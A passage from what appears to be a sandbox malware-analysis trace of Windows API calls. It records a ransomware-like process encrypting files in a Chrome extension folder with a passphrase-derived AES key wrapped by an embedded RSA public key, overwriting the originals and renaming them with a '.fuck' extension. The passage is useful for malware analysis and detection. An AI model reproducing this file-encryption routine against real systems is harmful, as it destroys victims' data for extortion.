CryptImportPublicKeyInfo (in: hCryptProv=0x2e71a58, dwCertEncodingType=0x1, pInfo=0x2eac650*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eac680*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eac688*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bfe4 | out: phKey=0x2b9bfe4*=0x2e7db40) returned 1 [0261.565] CryptEncrypt (in: hKey=0x2e7db40, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bfd4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bfd4*=0x80) returned 1 [0261.565] CryptEncrypt (in: hKey=0x2e7db40, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e716a0*, pdwDataLen=0x2b9bfe8*=0x18, dwBufLen=0x80 | out: pbData=0x2e716a0*, pdwDataLen=0x2b9bfe8*=0x80) returned 1 [0261.565] WriteFile (in: hFile=0x5d60, lpBuffer=0x2e716a0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x2e716a0*, lpNumberOfBytesWritten=0x2b9bff8*=0x80, lpOverlapped=0x0) returned 1 [0261.566] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0xf2, lpOverlapped=0x0) returned 1 [0261.567] CryptEncrypt (in: hKey=0x2e7dc80, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0xf2, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x100) returned 1 [0261.568] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x100, lpOverlapped=0x0) returned 1 [0261.568] CloseHandle (hObject=0x5d64) returned 1 [0261.568] CloseHandle (hObject=0x5d60) returned 1 [0261.568] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app_redirect.js.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app_redirect.js.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app_redirect.js" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app_redirect.js"), bFailIfExists=0) returned 1 [0261.571] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app_redirect.js", dwFileAttributes=0x0) returned 1 [0261.572] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app_redirect.js.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app_redirect.js.gsg")) returned 1 [0261.573] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app_redirect.js" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app_redirect.js"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app_redirect.js.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app_redirect.js.fuck")) returned 1 [0261.574] CryptDestroyHash (hHash=0x2e7fc40) returned 1 [0261.574] CryptDestroyKey (hKey=0x2e7dc80) returned 1 [0261.574] CryptReleaseContext (hProv=0x2e7a500, dwFlags=0x0) returned 1 [0261.574] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0261.575] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cff4 | out: lpSystemTimeAsFileTime=0x2b9cff4) [0261.575] GetLastError () returned 0x0 [0261.575] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\chromecast_logo_grey.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\chromecast_logo_grey.png")) returned 0x20 [0261.575] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\chromecast_logo_grey.png", dwFileAttributes=0x80) returned 1 [0261.576] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\chromecast_logo_grey.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\chromecast_logo_grey.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0261.577] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\chromecast_logo_grey.png.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\chromecast_logo_grey.png.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0261.577] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\chromecast_logo_grey.png.gsg", dwFileAttributes=0x2) returned 1 [0261.578] CryptAcquireContextA (in: phProv=0x2b9bff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bff0*=0x2e7a500) returned 1 [0261.580] CryptCreateHash (in: hProv=0x2e7a500, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bff4 | out: phHash=0x2b9bff4) returned 1 [0261.580] lstrlenA (lpString="yhIePWeHCpPAWIDQWkbMuMJxzMlQm") returned 29 [0261.580] CryptHashData (hHash=0x2e7fc40, pbData=0x28cb5a8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0261.580] CryptDeriveKey (in: hProv=0x2e7a500, Algid=0x6610, hBaseData=0x2e7fc40, dwFlags=0x1000000, phKey=0x2b9bfe0 | out: phKey=0x2b9bfe0*=0x2e7dd40) returned 1 [0261.580] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----c", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bffc, pcbBinary=0x2b9bfdc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bffc, pcbBinary=0x2b9bfdc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0261.580] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bffc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bfd0, pcbStructInfo=0x2b9bfd8 | out: pvStructInfo=0x2b9bfd0, pcbStructInfo=0x2b9bfd8) returned 1 [0261.580] CryptAcquireContextA (in: phProv=0x2b9bfec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bfec*=0x2e718c0) returned 1 [0261.581] CryptImportPublicKeyInfo (in: hCryptProv=0x2e718c0, dwCertEncodingType=0x1, pInfo=0x2eac580*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eac5b0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eac5b8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bfe4 | out: phKey=0x2b9bfe4*=0x2e7dd80) returned 1 [0261.581] CryptEncrypt (in: hKey=0x2e7dd80, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bfd4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bfd4*=0x80) returned 1 [0261.581] CryptEncrypt (in: hKey=0x2e7dd80, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e71bf0*, pdwDataLen=0x2b9bfe8*=0x18, dwBufLen=0x80 | out: pbData=0x2e71bf0*, pdwDataLen=0x2b9bfe8*=0x80) returned 1 [0261.581] WriteFile (in: hFile=0x5d64, lpBuffer=0x2e71bf0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x2e71bf0*, lpNumberOfBytesWritten=0x2b9bff8*=0x80, lpOverlapped=0x0) returned 1 [0261.583] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.602] CryptEncrypt (in: hKey=0x2e7dd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.602] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.605] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.605] CryptEncrypt (in: hKey=0x2e7dd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.605] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.605] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.605] CryptEncrypt (in: hKey=0x2e7dd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.605] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.606] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.606] CryptEncrypt (in: hKey=0x2e7dd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.606] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.606] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.606] CryptEncrypt (in: hKey=0x2e7dd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.606] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.606] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.606] CryptEncrypt (in: hKey=0x2e7dd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.606] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.606] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.607] CryptEncrypt (in: hKey=0x2e7dd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.607] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.607] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x36f, lpOverlapped=0x0) returned 1 [0261.607] CryptEncrypt (in: hKey=0x2e7dd40, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x36f, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x370) returned 1 [0261.607] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x370, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x370, lpOverlapped=0x0) returned 1 [0261.607] CloseHandle (hObject=0x5d60) returned 1 [0261.607] CloseHandle (hObject=0x5d64) returned 1 [0261.607] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\chromecast_logo_grey.png.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\chromecast_logo_grey.png.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\chromecast_logo_grey.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\chromecast_logo_grey.png"), bFailIfExists=0) returned 1 [0261.613] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\chromecast_logo_grey.png", dwFileAttributes=0x0) returned 1 [0261.613] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\chromecast_logo_grey.png.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\chromecast_logo_grey.png.gsg")) returned 1 [0261.615] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\chromecast_logo_grey.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\chromecast_logo_grey.png"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\chromecast_logo_grey.png.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\chromecast_logo_grey.png.fuck")) returned 1 [0261.617] CryptDestroyHash (hHash=0x2e7fc40) returned 1 [0261.617] CryptDestroyKey (hKey=0x2e7dd40) returned 1 [0261.617] CryptReleaseContext (hProv=0x2e7a500, dwFlags=0x0) returned 1 [0261.617] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0261.617] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cff4 | out: lpSystemTimeAsFileTime=0x2b9cff4) [0261.617] GetLastError () returned 0x0 [0261.618] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\devices.html" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\devices.html")) returned 0x20 [0261.619] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\devices.html", dwFileAttributes=0x80) returned 1 [0261.620] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\devices.html" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\devices.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0261.620] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\devices.html.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\devices.html.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0261.623] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\devices.html.gsg", dwFileAttributes=0x2) returned 1 [0261.624] CryptAcquireContextA (in: phProv=0x2b9bff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bff0*=0x2e7a500) returned 1 [0261.627] CryptCreateHash (in: hProv=0x2e7a500, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bff4 | out: phHash=0x2b9bff4) returned 1 [0261.627] lstrlenA (lpString="yhIePWeHCpPAWIDQWkbMuMJxzMlQm") returned 29 [0261.627] CryptHashData (hHash=0x2e7fc40, pbData=0x28cb620, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0261.627] CryptDeriveKey (in: hProv=0x2e7a500, Algid=0x6610, hBaseData=0x2e7fc40, dwFlags=0x1000000, phKey=0x2b9bfe0 | out: phKey=0x2b9bfe0*=0x2e7dac0) returned 1 [0261.627] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----c", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bffc, pcbBinary=0x2b9bfdc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bffc, pcbBinary=0x2b9bfdc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0261.627] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bffc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bfd0, pcbStructInfo=0x2b9bfd8 | out: pvStructInfo=0x2b9bfd0, pcbStructInfo=0x2b9bfd8) returned 1 [0261.627] CryptAcquireContextA (in: phProv=0x2b9bfec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bfec*=0x2e71d00) returned 1 [0261.627] CryptImportPublicKeyInfo (in: hCryptProv=0x2e71d00, dwCertEncodingType=0x1, pInfo=0x2eabfd0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eac000*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eac008*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bfe4 | out: phKey=0x2b9bfe4*=0x2e7dbc0) returned 1 [0261.628] CryptEncrypt (in: hKey=0x2e7dbc0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bfd4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bfd4*=0x80) returned 1 [0261.628] CryptEncrypt (in: hKey=0x2e7dbc0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e71c78*, pdwDataLen=0x2b9bfe8*=0x18, dwBufLen=0x80 | out: pbData=0x2e71c78*, pdwDataLen=0x2b9bfe8*=0x80) returned 1 [0261.628] WriteFile (in: hFile=0x5d60, lpBuffer=0x2e71c78*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x2e71c78*, lpNumberOfBytesWritten=0x2b9bff8*=0x80, lpOverlapped=0x0) returned 1 [0261.630] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x3b, lpOverlapped=0x0) returned 1 [0261.632] CryptEncrypt (in: hKey=0x2e7dac0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x3b, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x40) returned 1 [0261.632] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x40, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x40, lpOverlapped=0x0) returned 1 [0261.632] CloseHandle (hObject=0x5d64) returned 1 [0261.632] CloseHandle (hObject=0x5d60) returned 1 [0261.632] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\devices.html.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user 